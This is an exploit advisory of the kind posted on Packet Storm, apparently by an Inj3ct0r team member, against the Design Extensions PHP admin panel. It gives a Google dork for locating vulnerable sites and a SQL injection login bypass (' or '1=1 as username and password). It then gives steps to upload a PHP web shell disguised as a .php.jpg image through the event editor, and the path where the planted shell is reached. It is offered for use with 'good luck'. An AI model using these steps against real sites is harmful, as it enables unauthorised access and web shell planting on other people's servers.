Design Extensions suffers from shell upload and remote SQL injection vulnerabilities.
2f69b55a2460678d60c9aebcf63d8418d63dbe9fb83edcba15217f385cd882d31-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm kalashinkov3 member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#########################################################
# Title : Design Extensions (Admin) Auth Bypass/File Upload
# Author: Kalashinkov3
# Vendor: [designextensions.com]
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 26/05/2011
# Google Dork : intext:"by Design Extensions"
# Category : PHP [SQli]
#########################################################
# http://[localhost].com/admin
# Username : ' or '1=1
# Password : ' or '1=1
# Upload Shell
go to Events --> Edit Events --> Upload your shell "Shell.php.jpg" & Save
your shell --> http://[localhost].com/admin/event_images/small_photo/*_~shell.php.jpg
^_^ G00d LUCK ALL :=)
==========================================================================
# Greets To : all-->My friends, Algerians Hacker'S, mmembre 1337Day # :) #
==========================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed